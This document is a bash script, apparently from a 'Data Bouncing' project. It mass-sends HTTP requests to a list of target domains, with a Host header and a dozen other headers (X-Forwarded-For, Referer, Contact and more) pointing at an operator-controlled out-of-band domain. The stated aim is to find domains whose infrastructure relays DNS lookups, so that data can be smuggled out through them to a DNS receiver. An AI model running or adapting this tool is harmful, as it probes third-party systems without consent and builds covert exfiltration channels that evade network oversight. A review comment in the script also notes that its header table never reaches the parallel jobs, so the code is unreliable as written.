HeadHunterv2.sh
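#!/bin/bash
# A hunter script from John & Dave's Data Bouncing project https://thecontractor.io/data-bouncing/
# This script will find candidates for smuggling data / comms / whatever, starting as HTTP/S requests to domains and ending up in your DNS receiver to be rebuilt/read, whatever
# don't forget to add your own OOB server, that could be interactsh or collaborator, or something else; if you don't know what you're doing, go read the posts :)
# have fun, don't be a dick.

# Pre-flight check to verify and install necessary utilities.
# curl sends the requests, parallel fans them out, bc computes the progress
# percentage.  A missing tool prompts the user; installing needs root and
# either apt or yum.  Every failure path exits 1 with a message on stderr.
for utility in curl parallel bc; do
  if command -v "$utility" &> /dev/null; then
    continue
  fi
  # -r keeps backslashes in the answer literal
  read -r -p "$utility is not installed. Would you like to install it? (y/N) " yn
  case "$yn" in
    [Yy]* )
      if [[ "$EUID" -ne 0 ]]; then
        printf '%s\n' "Please run this script as root or use sudo to install $utility." >&2
        exit 1
      fi
      if command -v apt &> /dev/null; then
        apt update && apt install -y "$utility"
      elif command -v yum &> /dev/null; then
        yum install -y "$utility"
      else
        printf '%s\n' "Could not find a package manager to install $utility. Please install it manually." >&2
        exit 1
      fi
      ;;
    * )
      printf '%s\n' "$utility is required for this script to run. Exiting." >&2
      exit 1
      ;;
  esac
  # The package manager's status is not checked above; verify the tool is
  # actually usable now rather than failing later in the middle of a run.
  if ! command -v "$utility" &> /dev/null; then
    printf '%s\n' "Installation of $utility failed. Exiting." >&2
    exit 1
  fi
done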
# Default OOB domain (placeholder value; override with -o)
oob_domain="127.0.0.1/changeme"

# Header formats: header name -> printf format for its value.
# The single %s is filled with the target domain when the request is built.
# The oob.com suffix is written literally in each format and is not derived
# from oob_domain.
declare -A headers=(
  ["X-Forwarded-For"]="xff.%s.oob.com"
  ["X-Wap-Profile"]="wafp.%s.oob.com/wap.xml"
  ["CF-Connecting_IP"]="cfcon.%s.oob.com"
  ["Contact"]="root@contact.%s.oob.com"
  ["X-Real-IP"]="rip.%s.oob.com"
  ["True-Client-IP"]="trip.%s.oob.com"
  ["X-Client-IP"]="xclip.%s.oob.com"
  ["Forwarded"]="for=ff.%s.oob.com"
  ["X-Originating-IP"]="origip.%s.oob.com"
  ["Client-IP"]="clip.%s.oob.com"
  ["Referer"]="ref.%s.oob.com"
  ["From"]="root@from.%s.oob.com"
)

# Default domains file name (override with -d)
domains_file="domains.txt"
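# Parse command-line arguments
#   -o <domain>  OOB domain used as the suffix of the Host header
#   -d <file>    file with one target domain per line
# The leading ':' in the optstring makes getopts report a missing argument
# as ':' and an unknown option as '?', with the option letter in OPTARG in
# both cases; they are handled separately so the message says which it was.
while getopts ":o:d:" opt; do
  case "${opt}" in
    o )
      oob_domain=$OPTARG
      ;;
    d )
      domains_file=$OPTARG
      ;;
    : )
      echo "Option -$OPTARG requires an argument" >&2
      exit 1
      ;;
    * )
      echo "Invalid option: -$OPTARG" >&2
      exit 1
      ;;
  esac
done
# Drop the parsed options so only non-option arguments remain
shift $((OPTIND - 1))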
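# User agent to use in the requests
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"

# Check if domains file exists (path comes from -d or the default)
if [[ ! -f "$domains_file" ]]; then
  printf '%s\n' "File $domains_file not found!" >&2
  exit 1
fi

# Total number of non-empty lines in the domains file; used for the
# "N of M" progress report in process_domain (0 when the file is empty)
total_hosts=$(grep -c . "$domains_file")

# Create a log file named after the start time, in the current directory
log_file="script_log_$(date +"%Y%m%d_%H%M%S").txt"

# Export variables for access in parallel jobs, which run in separate
# shell processes and only see what is in the environment
export user_agent
export oob_domain
export total_hosts
export log_file
# NOTE(review): bash does not place array variables in the environment, so
# this export does not carry the associative table into child processes;
# confirm that the jobs actually see `headers`.
export headers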
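#######################################
# Send one probe request to a domain and report progress.
# Invoked by parallel once per line of the domains file.
# Globals:
#   PARALLEL_SEQ  (read) sequence number of this job, supplied by parallel
#   total_hosts   (read) number of non-empty lines in the domains file
#   user_agent    (read) value of the User-Agent header
#   oob_domain    (read) suffix appended to the Host header
#   headers       (read) header name -> printf format for its value
#   log_file      (written) one progress line is appended per call
# Arguments:
#   $1 - domain to request; an empty value is skipped
# Outputs:
#   progress line to stdout and to log_file; the curl output is discarded
# Returns:
#   0 for an empty domain; otherwise the status of the final log append
#   (curl's exit status is not checked)
#######################################
process_domain() {
  local domain=$1
  local current_host_number=$PARALLEL_SEQ
  local percentage_complete timestamp log_message header formatted_header
  local -a curl_headers

  # Skip empty lines
  [[ -z "$domain" ]] && return 0

  # Percentage of completion with two decimals (bc handles the division)
  if (( total_hosts > 0 )); then
    percentage_complete=$(bc <<< "scale=2; ($current_host_number / $total_hosts) * 100")
  else
    percentage_complete=0
  fi

  # Construct headers for the current domain
  curl_headers=(
    -H "User-Agent: ${user_agent}"
    -H "Host: host.${domain}.${oob_domain}"
    -H "Origin: https://${domain}"
  )
  for header in "${!headers[@]}"; do
    # The table value is the printf format and %s receives the domain.
    # shellcheck disable=SC2059 -- the format comes from the script's own table
    formatted_header=$(printf "${headers[$header]}" "$domain")
    curl_headers+=(-H "${header}: ${formatted_header}")
  done

  # Execute the curl command with the generated headers; the response body
  # is not needed, so it is discarded
  curl -i -s -k -X GET \
    --max-time 16 \
    "${curl_headers[@]}" \
    "http://${domain}/" > /dev/null

  # Create a log message with the progress report
  timestamp=$(date +"%Y-%m-%d %H:%M:%S")
  log_message="$timestamp - Request sent to $domain - $current_host_number of $total_hosts ($percentage_complete% complete)"

  # Print the log message to the console and append it to the log file
  printf '%s\n' "$log_message"
  printf '%s\n' "$log_message" >> "$log_file"
}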
# Make the function visible to the shells that parallel spawns
export -f process_domain

# Run process_domain once per line of the domains file, with as many
# concurrent jobs as there are CPU threads (--jobs 100%); each line is
# passed to the function as its single argument
parallel --arg-file "$domains_file" --jobs 100% process_domain